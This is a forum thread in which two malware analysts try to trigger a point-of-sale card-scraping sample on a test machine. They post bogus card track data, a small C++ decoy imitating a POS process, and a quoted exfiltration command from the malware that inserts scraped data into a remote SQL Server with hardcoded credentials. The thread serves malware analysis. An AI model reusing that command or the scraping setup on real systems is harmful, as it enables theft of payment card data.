[unixfreaxjp]

Does the exe send any TCP data encoded with that key in the registy?

↑This is actually a problem, I think that was the key, but have no crypted data catched to test this key itself.. (expected to be seen in network traffic) since somehow this thig is so shy and didn't send anything yet (even now still running)
I even make the script to run the malware process using net start|stop and it works well to start/stop this two evil services, YET still no networking happen yet, rgds!

[bsteo]

Do this with Notepad or whatever:

4744870016311111=14091010000000000072
%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?

And if that doesn't trigger it, just make a bogus "posw32.exe" that can keep those strings in memory, I think that should make it send data.

Idea:

posw32.cpp

Code: Select all

#include <iostream>
#include <conio.h>
#include <windows.h>

using namespace std;

char track1[100] = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?";
char track2[100] = "4744870016311111=14091010000000000072";

int main(){
	cout << track1 << endl;
	cout << track2 << endl;
	getch();
	return 0;
}

[unixfreaxjp]

Do this with Notepad or whatever:

Nice idea w/thanks for the Notepad stuff.. However it wasn't work, believe me I did try.
I even inject those string to the memory directly and not sending any network. What's wrong with this thing?? Since my environment is still having this case running, pls kindly advice anything to make this boo boo sending calls to mothership, with sincerely regards.
PS: I am on making theat bogus with gcc now.. hope cygwin compiled bogus can fool this boo boo.

[unixfreaxjp]

Do this with Notepad or whatever:

However it wasn't work, believe me I did try.

I even flood it :) see the pic below:

The memory also full of those strings:

Really whish to see a successful attempt with traffic.. I will need my testPC for testing other malware, in the mean time I keep it running with these boo boo..

[bsteo]

Very weird. Maybe it refuses to send anything to mothership because is under VM? Or when executet it reads some registry keys to see if that POST software version is installed or not?

[unixfreaxjp]

Very weird indeed, that's why I tried everything I can think of..

Very weird. Maybe it refuses to send anything to mothership because is under VM?

I never use VM. Always tested in real machine

Or when executet it reads some registry keys to see if that POST software version is installed or not?

The only clue of it detected POSW32.EXE program is:

I didn't see it search registry for posw32 so far (capture every details of it though...)
Furthermoe I still didn't understand the native of infection, tried to seek it myself but the site was cleaned up, only the post in KM was my lead..

[bsteo]

If the malware fetches any data it sends it dirrectly to a MS SQL Server as encoded data (looks like first layer is some kind of base64 with custom alphabet).

svchosts -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=xx.xxx.xxx.xxx,443;uid=sa;pwd=NevertHeL3ss', 'SELECT tab from rec..tbl') SELECT '%s'"

By the way I saw many references to a string "Retalix" in your logs, Retalix is a POS software provider/supplier (http://www.retalix.com).

[unixfreaxjp]

If the malware fetches any data it sends it dirrectly to a MS SQL Server as encoded data (looks like first layer is some kind of base64 with custom alphabet).

Friend. Please share us "how" did you know all of these by using that sample? Since I can't see any of these in the sample I tested and no traffic reproduced.
Thank's for checking the captured logs, yes I also realized that Relatix is the POS maker.

[unixfreaxjp]

Last effort:

Three Attached Sample's Recorded FileI/O + Registry Operation:
first sample: http://pastebin.com/raw.php?i=WyRqNQbp
second sample: http://pastebin.com/raw.php?i=nYQmZF9i
third sample: http://pastebin.com/raw.php?i=jitpvJUG

These sandbox results also more-less saying same stuffs as per I tested:
http://camas.comodo.com/cgi-bin/submit? ... 80994f5900
http://camas.comodo.com/cgi-bin/submit? ... 634d2faaba
http://camas.comodo.com/cgi-bin/submit? ... 9143c569cf
http://anubis.iseclab.org/?action=resul ... ormat=html
http://anubis.iseclab.org/?action=resul ... ormat=html
http://anubis.iseclab.org/?action=resul ... ormat=html

No network, just sitting there. I'll rest my case. Nothing further.

[bsteo]

If the malware fetches any data it sends it dirrectly to a MS SQL Server as encoded data (looks like first layer is some kind of base64 with custom alphabet).

Friend. Please share us "how" did you know all of these by using that sample? Since I can't see any of these in the sample I tested and no traffic reproduced.
Thank's for checking the captured logs, yes I also realized that Relatix is the POS maker.

aassfxxx above did a good job but not complete.

http://aassfxxx.infos.st/article21/pos- ... m-scrapper